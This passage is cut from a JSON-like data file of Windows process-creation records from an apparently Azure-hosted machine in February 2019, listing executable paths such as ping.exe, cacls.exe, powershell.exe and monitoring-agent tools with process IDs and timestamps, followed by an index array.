12:48:33.300000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x10082019-02-10 12:48:33.317000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x23ec2019-02-10 12:48:51.180000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22742019-02-10 12:48:51.207000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1f882019-02-10 12:49:08.373000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x239c2019-02-10 12:49:09.170000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x17702019-02-10 12:49:26.303000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xfc02019-02-10 12:49:26.333000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x7f82019-02-10 12:49:43.463000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 12:49:43.483000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1dec2019-02-10 12:50:00.633000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb002019-02-10 12:50:00.660000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xeb02019-02-10 12:50:17.820000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x158c2019-02-10 12:50:17.833000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x7942019-02-10 12:50:35.010000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x4582019-02-10 12:50:35.033000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1b002019-02-10 12:50:52.190000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xb282019-02-10 12:50:52.227000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x6342019-02-10 12:51:09.383000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x16a82019-02-10 12:51:09.400000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x1e682019-02-10 12:51:26.553000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa982019-02-10 12:51:27.350000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x14c82019-02-10 12:51:44.527000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6c02019-02-10 12:51:44.540000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x22c02019-02-10 12:52:01.710000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22802019-02-10 12:52:01.737000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xccc2019-02-10 12:52:18.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x67c2019-02-10 12:52:18.950000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x8782019-02-10 12:52:38.103000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13d82019-02-10 12:52:38.123000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x14582019-02-10 12:53:00.327000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa242019-02-10 12:53:00.350000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1cd82019-02-10 12:53:16.500000\",\"c:\\\\windows\\\\system32\\\\taskhostw.exe0x14202019-02-10 12:59:59.870000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x8f82019-02-10 13:28:02.253000\",\"c:\\\\windows\\\\system32\\\\usoclient.exe0xc5c2019-02-10 13:55:20.800000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f882019-02-10 13:55:20.813000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1cd82019-02-10 14:28:02.247000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x19d82019-02-09 22:55:10.333000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x1e3c2019-02-10 15:07:12.880000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1a9c2019-02-10 15:28:02.243000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17702019-02-10 15:44:47.250000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12602019-02-10 15:44:47.267000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x55c2019-02-10 15:44:47.450000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x115c2019-02-10 15:44:47.467000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20682019-02-10 15:44:47.483000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x11dc2019-02-10 15:45:07.637000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x13e42019-02-10 15:45:07.653000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x15242019-02-10 15:45:27.887000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17b02019-02-10 15:45:27.907000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x8c42019-02-10 15:45:57.147000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22282019-02-10 15:45:58.020000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1cf02019-02-10 15:46:22.260000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18602019-02-10 15:46:22.287000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x18742019-02-10 15:46:44.473000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xa902019-02-10 15:46:44.503000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x11a82019-02-10 15:47:06.720000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x173c2019-02-10 15:47:06.750000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x19102019-02-10 15:47:31.987000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db42019-02-10 15:47:32.003000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x4382019-02-10 15:47:45.133000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20182019-02-10 15:47:45.153000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x21c82019-02-10 15:47:49.197000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20442019-02-10 15:47:49.223000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x22002019-02-10 15:47:49.237000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11242019-02-10 15:47:49.253000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xd442019-02-10 15:48:03.363000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c242019-02-10 15:48:04.127000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x11982019-02-10 15:48:04.297000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x135c2019-02-10 15:48:04.310000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd042019-02-10 15:48:04.323000\",\"c:\\\\windows\\\\system32\\\\reg.exe0x23642019-02-10 15:48:18.437000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x11102019-02-10 15:48:18.460000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x9942019-02-10 15:48:32.593000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23282019-02-10 15:48:32.613000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x6d42019-02-10 15:48:46.753000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x20e42019-02-10 15:48:47.493000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x19982019-02-10 15:49:01.577000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf542019-02-10 15:49:01.603000\",\"c:\\\\windows\\\\system32\\\\cacls.exe0x5a82019-02-10 15:49:15.733000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1db82019-02-10 15:49:15.750000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x1fa42019-02-10 15:49:29.877000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x6042019-02-10 15:49:29.903000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1f242019-02-10 15:49:44.043000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x5182019-02-10 15:49:44.060000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x21702019-02-10 15:49:58.200000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12a82019-02-10 15:49:58.227000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x200c2019-02-10 15:50:12.367000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xf802019-02-10 15:50:12.397000\",\"c:\\\\windows\\\\system32\\\\rundll32.exe0x18602019-02-10 15:50:26.530000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x18742019-02-10 15:50:26.550000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0xccc2019-02-10 15:50:40.703000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xd7c2019-02-10 15:50:56.413000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x16342019-02-10 15:51:10.573000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x17482019-02-10 15:51:10.590000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x18982019-02-10 15:51:24.723000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1eb42019-02-10 15:51:24.747000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14682019-02-10 15:51:38.890000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x22002019-02-10 15:51:38.953000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x1e8c2019-02-10 15:51:39.990000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x23482019-02-10 15:51:40.003000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x11f02019-02-10 15:51:41.033000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x1f202019-02-10 15:51:41.053000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0x14802019-02-10 15:51:49.140000\",\"c:\\\\windows\\\\system32\\\\services.exe0x2201970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x9802019-02-09 23:13:35.000000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x17042019-02-10 00:14:24.307000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe0x15202019-02-10 00:45:29.713000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe0x16cc2019-02-10 00:45:32.377000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiapsrv.exe0xfd42019-02-10 00:48:31.607000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x53c2019-02-10 01:15:12.267000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xbbc2019-02-10 01:28:44.710000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x23e82019-02-10 02:16:01.357000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0xdf82019-02-10 03:16:49.923000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1c502019-02-09 20:28:56.763000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x3942019-02-10 04:08:34.507000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x105c2019-02-10 04:17:37.363000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xd442019-02-10 05:10:54.303000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x9942019-02-10 05:18:26.020000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x17e02019-02-10 06:19:15.163000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0xa582019-02-10 06:28:59.927000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x15642019-02-10 08:20:53.497000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x13282019-02-10 09:21:42.017000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x1e3c2019-02-09 22:12:35.813000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x1fa82019-02-10 10:22:30.100000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x12d42019-02-10 11:23:18.200000\",\"c:\\\\program files (x86)\\\\google\\\\update\\\\googleupdate.exe0x1f382019-02-10 11:28:16.790000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x239c2019-02-10 12:24:06.663000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x23202019-02-10 13:24:54.133000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x1f3c2019-02-10 14:25:42.670000\",\"c:\\\\windows\\\\system32\\\\sppsvc.exe0x11f02019-02-10 15:26:31.390000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\monitoringhost.exe0x8641970-01-01 00:00:00.000000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x8dc2019-02-09 21:02:56.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x183c2019-02-09 21:02:56.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xd742019-02-09 23:22:56.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x21c82019-02-09 23:22:56.267000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x6f82019-02-09 23:32:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1c242019-02-09 23:32:56.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x1fc02019-02-10 00:02:56.257000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x17a42019-02-10 00:02:56.270000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x10bc2019-02-10 00:12:56.253000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1c102019-02-10 00:12:56.263000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xb482019-02-10 00:32:56.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x235c2019-02-10 00:32:56.287000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xbd02019-02-09 21:32:56.270000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x14682019-02-09 21:32:56.290000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0x15c82019-02-09 20:32:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12782019-02-09 20:32:56.280000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xe342019-02-09 22:02:56.263000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xbc2019-02-09 22:02:56.277000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0x53c2019-02-09 22:32:56.247000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x18342019-02-09 22:32:56.260000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf\\\\desiredstateconfiguration\\\\dscrun.exe0xef42019-02-09 22:32:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15f42019-02-09 22:32:56.273000\",\"c:\\\\program files\\\\microsoft monitoring agent\\\\agent\\\\health service state\\\\ict 2\\\\cmf-64\\\\desiredstateconfiguration\\\\dscrun.exe0xcd82019-02-09 20:52:56.260000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xfd42019-02-09 20:52:56.270000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x181c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xbc2019-02-09 21:09:24.310000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1b282019-02-09 21:09:24.320000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe0x15f42019-02-09 22:01:13.703000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xda82019-02-09 22:01:13.727000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0x16e02019-02-09 22:01:30.850000\",\"c:\\\\windows\\\\system32\\\\ping.exe0xbb42019-02-09 22:01:30.870000\",\"c:\\\\windows\\\\system32\\\\netcfg.exe0x11f42019-02-09 22:01:48.043000\",\"c:\\\\windows\\\\system32\\\\ping.exe0x12d02019-02-09 22:01:48.070000\",\"c:\\\\windows\\\\system32\\\\cscript.exe0xce02019-02-09 22:02:05.223000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\waappagent.exe0x19941970-01-01 00:00:00.000000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-09 23:16:28.153000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x20b02019-02-09 23:16:28.163000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xccc2019-02-09 23:20:15.547000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x14ec2019-02-09 23:20:15.560000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0xda82019-02-09 23:55:46.057000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1cfc2019-02-09 23:55:46.063000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x7fc2019-02-10 00:22:33.813000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x108c2019-02-10 00:22:33.823000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x7982019-02-10 00:26:22.213000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x22e02019-02-10 00:26:22.227000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x172c2019-02-10 01:27:25.173000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1dec2019-02-10 01:27:25.197000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xe2c2019-02-10 01:31:14.010000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10802019-02-10 01:31:14.020000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xb142019-02-10 02:31:30.377000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x17ec2019-02-10 02:31:30.387000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x18982019-02-10 02:35:21.217000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10582019-02-10 02:35:21.230000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xe1c2019-02-10 03:35:37.273000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x8342019-02-10 03:35:37.283000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17c42019-02-10 03:39:26.323000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x88c2019-02-10 03:39:26.337000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x2e42019-02-10 04:39:41.880000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x108c2019-02-10 04:39:41.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x13602019-02-10 04:43:32.697000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x19f42019-02-10 04:43:32.710000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x19f02019-02-10 05:43:48.783000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15702019-02-10 05:43:48.793000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x17a82019-02-10 05:47:40.657000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x10582019-02-10 05:47:40.667000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0x82c2019-02-10 05:55:52.110000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xd442019-02-10 05:55:52.123000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1bfc2019-02-10 06:47:56.813000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x19982019-02-10 06:47:56.830000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1c102019-02-10 06:51:50.063000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x11842019-02-10 06:51:50.073000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xc6c2019-02-10 07:52:06.713000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4542019-02-10 07:52:06.727000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x65c2019-02-10 07:56:00.233000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xe1c2019-02-10 07:56:00.247000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x10702019-02-10 08:56:16.593000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1ce82019-02-10 08:56:16.607000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xb102019-02-10 09:00:10.517000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x22602019-02-10 09:00:10.533000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x1c542019-02-09 22:11:59.877000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x181c2019-02-09 22:11:59.890000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x8c02019-02-09 22:16:24.523000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1f602019-02-09 22:16:24.537000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x123c2019-02-10 10:00:27.043000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x5182019-02-10 10:00:27.057000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0xc982019-02-10 10:04:18.733000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1cdc2019-02-10 10:04:18.747000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x14842019-02-10 11:04:35.127000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xb142019-02-10 11:04:35.140000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x16bc2019-02-10 11:08:29.550000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x1bb42019-02-10 11:08:29.573000\",\"c:\\\\windowsazure\\\\secagent\\\\wasecagentprov.exe0x1be42019-02-10 11:55:57.567000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xec42019-02-10 11:55:57.577000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd682019-02-10 12:08:46.173000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xb642019-02-10 12:08:46.183000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1eb42019-02-10 12:12:35.877000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xc982019-02-10 12:12:35.887000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x6f82019-02-10 13:12:52.733000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x84c2019-02-10 13:12:52.743000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x1d6c2019-02-10 13:16:43.013000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x4902019-02-10 13:16:43.027000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0x16d42019-02-10 14:16:59.427000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0xa2c2019-02-10 14:16:59.437000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x65c2019-02-10 14:20:50.820000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x12fc2019-02-10 14:20:50.830000\",\"c:\\\\windowsazure\\\\guestagent_2.7.41491.901_2019-01-14_202614\\\\collectguestlogs.exe0xd782019-02-10 15:21:06.890000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x221c2019-02-10 15:21:06.907000\",\"c:\\\\windows\\\\system32\\\\cmd.exe0x12382019-02-10 15:24:56.040000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15842019-02-10 15:24:56.050000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\msmpeng.exe0x7c81970-01-01 00:00:00.000000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x14202019-02-09 22:54:40.460000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x20e42019-02-09 22:54:40.467000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x9ac2019-02-09 22:54:40.497000\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\mpam-d3ea18d4.exe0x10782019-02-09 22:55:15.427000\",\"c:\\\\windows\\\\servic~2\\\\networ~1\\\\appdata\\\\local\\\\temp\\\\90875aaa-9256-468e-a6b3-041d325c6594\\\\mpsigstub.exe0x1ea82019-02-09 22:55:23.273000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1a442019-02-09 22:54:40.470000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x15b82019-02-09 22:54:40.523000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x1da82019-02-09 22:54:40.560000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x99c2019-02-09 22:54:40.520000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x9742019-02-09 22:54:40.527000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x22802019-02-09 22:55:10.993000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x205c2019-02-09 22:55:12.353000\",\"c:\\\\windows\\\\system32\\\\conhost.exe0x13602019-02-09 22:55:12.623000\",\"c:\\\\programdata\\\\microsoft\\\\windows defender\\\\platform\\\\4.18.1812.3-0\\\\mpcmdrun.exe0x11d42019-02-09 22:55:12.807000\",\"c:\\\\windows\\\\system32\\\\svchost.exe0xaec1970-01-01 00:00:00.000000\",\"c:\\\\windows\\\\system32\\\\wbem\\\\wmiadap.exe0x1cc42019-02-10 00:46:29.117000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x220c2019-02-10 03:06:53.157000\",\"c:\\\\windows\\\\system32\\\\wuauclt.exe0xc142019-02-09 22:55:06.653000\",\"c:\\\\windows\\\\softwaredistribution\\\\download\\\\install\\\\am_delta.exe0x1f242019-02-09 22:55:07.023000\",\"c:\\\\windows\\\\system32\\\\mpsigstub.exe0x1b742019-02-09 22:55:07.220000\",\"c:\\\\windows\\\\system32\\\\wermgr.exe0x16202019-02-09 22:55:15.453000\"],\"source_index\":[\"1000\",\"0\",\"100\",\"102\",\"109\",\"122\",\"131\",\"133\",\"141\",\"170\",\"173\",\"174\",\"177\",\"180\",\"182\",\"179\",\"181\",\"183\",\"184\",\"185\",\"186\",\"187\",\"192\",\"193\",\"194\",\"195\",\"196\",\"197\",\"206\",\"207\",\"231\",\"232\",\"302\",\"303\",\"304\",\"305\",\"316\",\"317\",\"341\",\"342\",\"347\",\"348\",\"351\",\"352\",\"353\",\"354\",\"357\",\"358\",\"361\",\"362\",\"370\",\"371\",\"372\",\"373\",\"378\",\"379\",\"380\",\"381\",\"417\",\"418\",\"442\",\"443\",\"488\",\"489\",\"495\",\"496\",\"506\",\"507\",\"508\",\"509\",\"510\",\"511\",\"515\",\"516\",\"522\",\"523\",\"524\",\"525\",\"528\",\"529\",\"533\",\"534\",\"541\",\"542\",\"575\",\"576\",\"600\",\"601\",\"631\",\"632\",\"633\",\"634\",\"636\",\"637\",\"638\",\"639\",\"644\",\"646\",\"645\",\"647\",\"651\",\"652\",\"653\",\"654\",\"659\",\"660\",\"665\",\"666\",\"679\",\"680\",\"725\",\"726\",\"754\",\"755\",\"760\",\"761\",\"765\",\"766\",\"767\",\"768\",\"769\",\"770\",\"775\",\"776\",\"781\",\"782\",\"783\",\"784\",\"786\",\"787\",\"795\",\"796\",\"799\",\"800\",\"826\",\"828\",\"853\",\"854\",\"891\",\"893\",\"892\",\"894\",\"900\",\"901\",\"902\",\"903\",\"906\",\"907\",\"908\",\"909\",\"917\",\"918\",\"919\",\"920\",\"921\",\"922\",\"924\",\"925\",\"942\",\"944\",\"943\",\"945\",\"171\",\